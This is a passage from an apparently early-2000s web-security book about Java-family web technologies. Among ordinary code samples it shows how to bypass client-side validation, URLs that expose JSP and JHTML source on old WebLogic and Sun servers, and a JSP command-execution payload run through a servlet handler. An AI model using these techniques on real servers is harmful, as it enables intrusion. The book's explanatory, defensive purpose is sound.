Java

Java

File extension(s): none

Originally called Oak, Java was written by James Gosling of Sun Microsystems in the early 1990s. Truly one of the most over-promised and over-hyped technologies of the past decade, Java was originally designed for smart consumer electronics devices: a lofty goal for such a primal language. Even today, Java holds the almost unattainable promise of universal portability and functionality. Java's popularity in the market is significant, but its ubiquity remains unachieved.

Java is an object-oriented language or one that treats all elements of a program as objects (e.g., variables, functions, subroutines, or the application itself). Even though Java is a large part of Web applications today, its source code isn't disclosed not easily anyway to the client as in other Web languages. That's because Java is compiled into class files that contain bytecode.

In this section we discuss two main types of Java: client-based and server-based.

Client-Based Java

Client-based Java is designed to run in the processor space of the client system or end-user browser. Client-based Java code comes in two formats: applets and scripting languages.

Applets

Indicated by the <applet> tag embedded in HTML, Java applets are downloaded and run by the client Web browser. One of the main risks with applets is that, although they are obfuscated by bytecode, the typical Java class can be downloaded separately and decompiled, allowing an attacker to view readable Java source code. This technique allows someone to search for security weaknesses in your Java code, as we discuss further in this chapter and at length in later chapters.

Java applets can be written in any text file, as can most of the other languages being discussed in this chapter. In fact, a simple Java applet can be written in minutes. For example, to write a "Hello World!" applet, copy the following code into a text file, naming it with a .java extension:

import java.awt.Graphics;

import java.applet.Applet;

public class HelloWorldApplet extends Applet

{

  public void paint (Graphics g)

  {

  g.drawString("Hello, World!", 5, 30);

  }

}

Note the following:

         Import is equivalent to the #include in C/C++ in that it includes any classes referenced to the compiler.

         The sample Applet is an extension of the java.applet.Applet class, which gives it basic applet capabilities.

         The Graphics class is used to draw the graphics on the screen.

Next, you must compile it into bytecode, using a Java interpreter (http://java.sun.com). Once compiled, it resides in a Java class (HelloWorld.class). At this point you can include it in your HTML Web page by using the <applet> tag:

<APPLET

  code=HelloWorld.class

  height=200

  width=300>

</APPLET>

When Java is loaded into memory, it receives one stream for each method in the class. Then the bytecodes are executed by the CPU. Bytecode is a series of instructions, similar to a assembly or binary language, where each instruction consists of a one-byte opcode (the action) followed by zero or more operands. Because of bytecode, Java isn't sent in the clear over the Internet but is obfuscated by this instruction code. Unfortunately, this obfuscation doesn't hinder an attacker's ability to decompile the bytecode to produce Java source code. And, with Java source code, an attacker can peer into the guts of your application, including getting a look any passwords used to connect to your servers or access your databases.

Of the many Java decompilers available today, the most accurate is Java Decompiler (JAD) by Pavel Kouznetsov. In addition, the JAD engine is written in C++ making it incredibly fast. We discuss JAD further in later chapters.

Table 1-4 displays a detailed list of the <applet> tag.

Table 1-4. The Complete <applet> Breakdown
Tag	Description
<APPLET	Open of the <applet> tag.
CODEBASE =	(optional) The directory containing the .class files.
ARCHIVE =	(optional) Archives describing classes to be preloaded.
CODE = or OBJECT =	(required) The name of .class file. or (required if CODE is not used) The serialized representation of the applet.
ALT	= (optional) The displayed text on failure to run.
NAME	= (optional) The name of the instance.
WIDTH	= (required) The initial width in pixels of the applet.
HEIGHT	= (required) The initial height in pixels of the applet.
ALIGN	= (optional) The alignment of the applet within the HTML page.
VSPACE	= (optional) The number of pixels above the applet.
HSPACE	= (optional) The number of pixels on each side of the applet.
>	Close of the <applet> tag.
<PARAM NAME	= name VALUE = value> (optional) The name and value to pass to the applet.
<PARAM NAME	= name VALUE = value> (optional) The name and value to pass to the applet.
</APPLET>	Close of the <applet> tag.

Java Scripting Languages

Java scripting languages are run almost completely on the client's system. Their benefit is purely performance rather than security based, because they can be altered by an attacker and used against you.

JavaScript

JavaScript is a noncompiled, interpreted scripting language originally created by Netscape. The link between JavaScript and Java, however, is by name only. Java is compiled, object-oriented, and somewhat difficult to master. JavaScript is a simple, semi-object-oriented scripting language meant for rapid Web development. Although JavaScript has some basic object-oriented capabilities, it more closely resembles a scripting language, such as Perl. JavaScript is useful for simple tasks such as checking form data, adding HTML code on demand, and performing user specific computations such as date/time and browser considerations.

A simple example of a JavaScript in action is the following code, which will display a popup box when a button is clicked:

<html>

<head>

<title>Simple JavaScript Example</title>

<script language="Javascript">

<!-- hide for JavaScript challenged browsers

function popup()

{

  alert("Hello and welcome world!");

}

// Done hiding -->

</script>

</head>

<h1 align=center>My JavaScipt example</h1>

<div align=center>

<form>

<input type="button" value="Hello World Me!" onclick="popup()">

</form>

This example is good for familiarizing you with the language, how it is called, and how to recognize it during your Web hacking days. A better illustration of how limited JavaScript can be in securing your e-commerce environment is the next example.

Because JavaScript is client side, an attacker can bypass your input validation routines and input nonstandard data to potentially crash your application or, worse, get it to display sensitive information. In this example, we use JavaScript to validate the input from a user into a form to ensure that the correct age has been put in the Age field of the form. The JavaScript code restricts the age being inputted to 1 110. Any value under or over that range will be disallowed:

<html>

<head>

<title>Validate User Input in our Form</title>

<script>

<!-- hiding again

function validate_input()

{

  if (document.testform.age.value < 1)

  {

  alert('Nice try young thing. Please enter your REAL age');

  return false;

  }

  else

  {

  if (document.testform.age.value > 110)

  {

  alert('Nice try granpa. Please enter your REAL age');

  return false;

  }

  else

  {

  alert('Thanks for being '+document.testform.age.value);

  return true;

  }

  }

}

// done hiding -->

</script>

</head>

<body>

<form name=testform action="scripts/input.pl" method=post onSubmit="return validate_input()">

<b>Please enter your age:</b>

<input type=text name=age size=3 maxlength=3><br><br>

<input type=submit value="Submit Age">

</form>

</body>

</html>

Knowing that JavaScript is processed by the client browser, we can now save the HTML file from the Web server and remove the restricting lines of code. As a result, the local HTML file's validate_input() function simply returns true:

function validate_input()

{

  return true;

}

To complete the change, we need to point the action attribute from the localized action:

action="scripts/input.pl"

to the remote action attribute:

action="http://www.example.com/scripts/input.pl":

<form name=testform action="http://www.example.com/scripts/input.pl" method=post

onSubmit="return validate_input()">

You can then open the local file, input any value in the Age field that you want, and hit the Submit button. The results may be nothing, they may crash the server, or they may bring up a helpful error message. At any rate, the results are less than ideal.

Jscript

Jscript is Microsoft's attempt at providing a JavaScript clone for the Internet Explorer Web browser. Just like JavaScript, Jscript is an interpreted, object-based scripting language. But unlike JavaScript, Jscript can interact with Microsoft ActiveX components, much as VBScript can. Also, Jscript cannot read or write to files, and it cannot be used to create standalone applications.

Jscript is used much like JavaScript, in the <script> tag of HTML. The following code snippet will display the string "Hello World!" to the browser:

<HTML><HEAD>

<SCRIPT LANGUAGE="JScript">

<!-- hide again

function hello()  {

var mystring = "Hello World!";

document.write(mystring);

}

// done hiding -->

</SCRIPT>

</HEAD><BODY><h1>

<SCRIPT>

hello();

</SCRIPT>

</h1></BODY></HTML>

For more information on the Jscript language, check out http://www.asp-help.com/getstarted/ms/jscript/jstutor.asp.

Server-Based Java

Server-based Java comprises the largest use of Java on the Internet today, and thus is a tremendous target for hackers around the world. Server-based Java is typically implemented by Servlet technologies such as Java Server Pages (JSP) and Java HTML (JHTML).

Java Server Pages (JSP)

File extension(s): .jsp

In today's e-commerce world, few can claim JSP's domination in the marketplace. JSP is managed by Java Application Servers, which processes server-side JSP and translate it into HTML output for the client's browser. As we demonstrate in Chapter 12, JSP is a powerful tool that can be used to develop elaborate e-commerce Web sites as well as subvert its operational controls.

You can think of JSP as a scriptable version of Java that allows you to embed Java in an HTML file. JSP's are compiled as Java servlets that run on the server. As with ASP, by embedding JSP in your HTML files, you can create dynamic content. JSP's syntax isn't very impressive because it acts more like an interface to the Java engine on the server. In fact, the JSP syntax as defined by Sun fits on a single two-page PDF file found at http://java.sun.com/products/jsp/syntax.pdf.

Java Application Servers come in many different varieties, but the big five are BEA's WebLogic, Sun's Java Web Server, Allaire's JRun, IBM's WebSphere, and Oracle's JDeveloper. Combined, the big five comprise 95% of all Java Application Servers used in today's e-commerce environment.

Database Connectivity

The single greatest JSP function used is database connectivity, which displays dynamic content from databases. As a result, there are a number of database connectivity options, including JDBC, JDBC-ODBC bridge, Oracle JDBC OCI driver, Oracle JDBC Thin driver, and mySQL JDBC driver, to name a few. Here are a few of the database connectivity code snippets:

// JDBC-ODBC bridge

String url="jdbc:odbc:Autos";

Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");

Connection conn = DriverManager.getConnection(url, "sa", "guessme");

// Oracle JDBC OCI

String url="jdbc:oracle:oci7:@Autos";

Class.forName("oracle.jdbc.driver.OracleDriver");

Connection conn = DriverManager.getConnection(url, "sa", "guessme");

// Oracle JDBC Thin

String url="jdbc:odbc:thin:@myserver:1521:orcl";

Class.forName("oracle.jdbc.driver.OracleDriver");

Connection conn = DriverManager.getConnection(url, "sa", "guessme");

// mySQL JDBC

String url="jdbc:mysql:///Autos";

Class.forName("sun.jdbc.mysql.Driver");

Connection conn = DriverManager.getConnection(url);

To familiarize yourself with the JSP syntax, review the following database connectivity example:

<%@ page import="java.sql.*"%>

<%

try

{

Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");

// "Autos" is our SYSTEM DSN we are connecting to

String url="jdbc:odbc:Autos";

// Create the connection

Connection conn = DriverManager.getConnection(url, "sa", "guessme");

// Create the JDBC statement

Statement stmt = conn.createStatement();

String query="SELECT * FROM Autos";

// Execute the query

ResultSet result = stmt.execute(query);

printResults(result);

conn.close();

}

// Catch a problem

catch (Exception e) {}

// Print out a message

out.println("Query completed successfully");

%>

Whether you are a Web developer or security professional, to secure your Web applications you should be intimately familiar with these database connectivity code snippets, because database connectivity is at the heart of JSP functionality.

Source Code Disclosure

JSP can be forced to display the source code of a JSP file by forcing a handler that defaults to "AS-IS" processing of the source code. In other words, it can tell the Application Server to display the JSP source code as clear text.

Case Sensitivity

One hacking technique is simply to use different case in the .JSP nomenclature:

http://www.example.com/login.JsP

http://www.example.com/login.jsP

http://www.example.com/login.Jsp

In early versions of BEA's WebLogic, an attacker could display the source code of the JSP files by using that syntax.

Forcing Default Handlers

Another type of attack on BEA's WebLogic is to force a specific handler on a file to bring up the source code of that file:

http://www.example.com/file/login.jsp

In this way, an attacker could display the source code of the login.jsp file and perhaps obtain the sensitive username and password of the JSP. The security problem occurs because the default WebLogic configuration file contains the following line:

# Default servlet registration

# ------------------------------------------------

# Virtual name of the default servlet if no matching

# servlet is found

weblogic.httpd.defaultServlet=file

This misconfiguration default setting enables an attacker to view the source code of JSP files.

Arbitrary Command Execution

Under certain conditions, an attacker can force Sun's Java Web Server to execute a regular file (evil-file.html) and execute the commands in that file as if they were JSP. The file created would have a JSP tag similar to:

<%

String s=null, t="";

try

{

Process p=Runtime.getRuntime().exec("cmd /c dir");

BufferedReader sI = new BufferedReader(new InputStreamReader (p.getInputStream()));

while((s=sI.readLine())!=null){t+=s;} } catch(IOException e){e.printStackTrace();}

%>

<%=t %>

The command being run is the dir command, which on Windows systems displays the contents of the current directory. This command is innocuous, but an attacker can run any command she wants with Administrator or root level access. The <%=t%> command prints out the dir output.

To force the servlet handler to execute commands in the text file, an attacker uses a URL similar to:

http://www.example.com/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/evil-file.html

For more information about JSP technology, check out Sun's FAQ at http://java.sun.com/products/jsp/faq.html.

JHTML

File extension(s): .jhtml

JHTML is Sun's JavaSoft standard for including Java in an HTML file. As with all the server-side languages discussed so far, JHTML has its own tags and is processed before sending the output to the client browser, thereby offloading the processing required to the server.

JHTML looks exactly like HTML but has the additional <java> tag. Understanding security risks requires familiarity with the JHTML code. Take a look at these JHTML examples:

<java>

out.print("Java-generated Hello World");

</java>

The preceding code displays the words "Java-generated Hello World" to the browser. Another JHTML code snippet worth showing is a WebLogic implementation of database connectivity, using the Oracle JDBC OCI driver:

<java type=class>

  static final String jdbcClass = "weblogic.jdbc.oci.Driver";

  static final String jdbcURL  = "jdbc:weblogic:oracle:goldengate";

  static final String user  = "sa";

  static final String password  = "guessme";

  protected Connection getCon() {

  Connection conn  = null;

  try {

  Class.forName(jdbcClass).newInstance();

  conn = DriverManager.getConnection(jdbcURL, user, password);

  }

  catch (Exception f) {

  }

  return conn;

  }

</java>

As a language, JTHML shares much of JSP's simplicity; unfortunately, JHTML also shares many of JSP's security risks, including various source code disclosure vulnerabilities.

Source Code Disclosure

Forcing Default Handlers

Sun's Java Web Server fell victim to the same default handler forcing problem as WebLogic and also allowed access to JHTML files. The attacker merely specifies the /servlet/file/ handler before any JHTML file to reveal the source:

http://www.example.com/servlet/file/login.jhtml

http://www.example.com/servlet/invoker/login.jhtml

http://www.example.com/servlet/ssi/login.jhtml

http://www.example.com/servlet/ssinclude/login.jhtml

The fix was to alter the Servlet Aliases to force the following invokers to error instead of revealing the source code of the file:

/servlet/file error

/servlet/invoker error

/servlet/ssi error

/servlet/ssinclude error

Case Sensitivity

BEA's WebLogic server fell victim to the same bug as the JSP server: an attacker's ability to alter the case of the JHTML and display the source code to that file. The same syntax is used in the attack:

http://www.example.com/login.JhtmL

http://www.example.com/login.jhtmL

http://www.example.com/login.Jhtml

...

Thus a similar fate has befallen JHTML and all the other server-side processing languages. But with configuration changes, appropriate patch deployment, and input validation techniques by the Web site developer, the vast majority of security risks can be mitigated.